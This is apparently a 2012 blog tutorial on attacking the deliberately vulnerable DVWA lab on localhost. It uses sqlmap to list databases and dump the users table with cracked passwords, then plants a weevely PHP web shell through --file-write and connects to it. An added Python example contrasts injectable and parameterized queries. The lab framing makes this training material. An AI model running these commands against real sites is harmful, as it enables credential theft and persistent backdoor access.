Wednesday, 26 December 2012

SQL INJECTION


Mantra is a collection of free and open source tools integrated into a web browser, which can come in handy for students, penetration testers, web application developers, security professionals, etc. It is portable, ready-to-run, compact and follows the true spirit of free and open source software.

First, open the Mantra tools from the BackTrack menu. Type the commands:

root@bt:/pentest/web/mantra# ls
Mantra  OWASP Mantra
root@bt:/pentest/web/mantra# ./OWASP\ Mantra 



Burp Suite

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.





Now we will try an injection against the database behind localhost/dvwa.
Before that, we create the dvwa database.
Type the commands:


mysql -u root -p
mysql> create database dvwa;

Then go to localhost/dvwa in the Mantra browser and log in with:
user: admin
password: password


If the login succeeds, set DVWA Security to Low, then choose SQL Injection.

Make sure the proxy settings are in place first.
Then type anything you like (for example, test) in the User ID field and click Submit.



Look at Burp Suite. We will get some information about localhost/dvwa.



Now we try sqlmap:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=ev12eov2elt7kk5cphkld5ehi2" --dbs

    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org

We get the list of available databases, including dvwa:

available databases [3]:
[*] dvwa
[*] information_schema
[*] mysql

[03:22:02] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at 03:22:02

After we get the databases, look at the tables in dvwa. Type the command:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=ev12eov2elt7kk5cphkld5ehi2" -D dvwa --tables

The result is:
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

After that, we look at the contents of the users table by typing the command:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=ev12eov2elt7kk5cphkld5ehi2" -D dvwa -T users --dump

The result is:

Database: dvwa
Table: users
[5 entries]
+---------+---------+--------------------------------------------------+---------------------------------------------+-----------+------------+
| user_id | user    | avatar                                           | password                                    | last_name | first_name |
+---------+---------+--------------------------------------------------+---------------------------------------------+-----------+------------+
| 1       | admin   | http://localhost/dvwa/hackable/users/admin.jpg   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin     | admin      |
| 2       | gordonb | http://localhost/dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     |
| 3       | 1337    | http://localhost/dvwa/hackable/users/1337.jpg    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       |
| 4       | pablo   | http://localhost/dvwa/hackable/users/pablo.jpg   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      |
| 5       | smithy  | http://localhost/dvwa/hackable/users/smithy.jpg  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        |
+---------+---------+--------------------------------------------------+---------------------------------------------+-----------+------------+
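
Every sqlmap step in this walkthrough depends on the id parameter being pasted into the SQL text. The following added example (not part of the original post, and not DVWA's own code) reproduces that pattern beside a parameterized version; it assumes Python's sqlite3 with a constructed users table as a stand-in for the MySQL dvwa database, and the function names are hypothetical.

```python
import sqlite3

def make_db():
    """In-memory stand-in for dvwa.users; all rows are constructed samples."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, user TEXT, "
               "first_name TEXT, last_name TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", [
        (1, "admin", "admin", "admin", "constructed-hash-1"),
        (2, "gordonb", "Gordon", "Brown", "constructed-hash-2"),
        (3, "pablo", "Pablo", "Picasso", "constructed-hash-3"),
    ])
    return db

def lookup_vulnerable(db, user_id):
    # "Before": the request parameter becomes part of the SQL text, so the
    # database parses client input as SQL syntax.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '%s'" % user_id
    return db.execute(sql).fetchall()

def lookup_safe(db, user_id):
    # "After": reject anything that is not a short plain decimal id, then pass
    # the value as a bound parameter. The SQL text is constant, so input can
    # only ever be compared as data.
    if not (user_id.isascii() and user_id.isdigit() and len(user_id) <= 9):
        return []
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(sql, (int(user_id),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    # Constructed inputs: a normal id and a quote-breaking tautology.
    for value in ("1", "1' OR '1'='1"):
        print(repr(value), "vulnerable:", lookup_vulnerable(db, value))
        print(repr(value), "safe:      ", lookup_safe(db, value))
```

With the bound parameter in place there is no injection point left for the `--dbs`, `--dump` or `--file-write` steps in this walkthrough to use.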

After successfully reading the contents of the users table, it's time to make a backdoor entry so that we can easily.
Type the commands:

root@bt:/pentest/database/sqlmap# cd

root@bt:~# cd /pentest/backdoors/web/weevely/

root@bt:/pentest/backdoors/web/weevely# ls

root@bt:/pentest/backdoors/web/weevely# ./weevely.py generate password /root/tes.php



After the backdoor is made, it's time to upload it to /var/www/dvwa/tes.php by typing the command:


root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=ev12eov2elt7kk5cphkld5ehi2" --file-write=/root/tes.php --file-dest=/var/www/dvwa/tes.php

[22:24:36] [INFO] the back-end DBMS operating system is Linux
[22:24:36] [INFO] heuristics detected web page charset 'ascii'
do you want confirmation that the file '/var/www/dvwa/tes.php' has been successfully written on the back-end DBMS file system? [Y/n]

Choose Y or press Enter.


Then connect to the backdoor that was uploaded to DVWA.
Type the command:

root@bt:/pentest/backdoors/web/weevely# ./weevely.py http://localhost/dvwa/tes.php password
Then:
www-data@bt:/var/www/dvwa$ ls


If successful, it will display the results.


Good Luck ..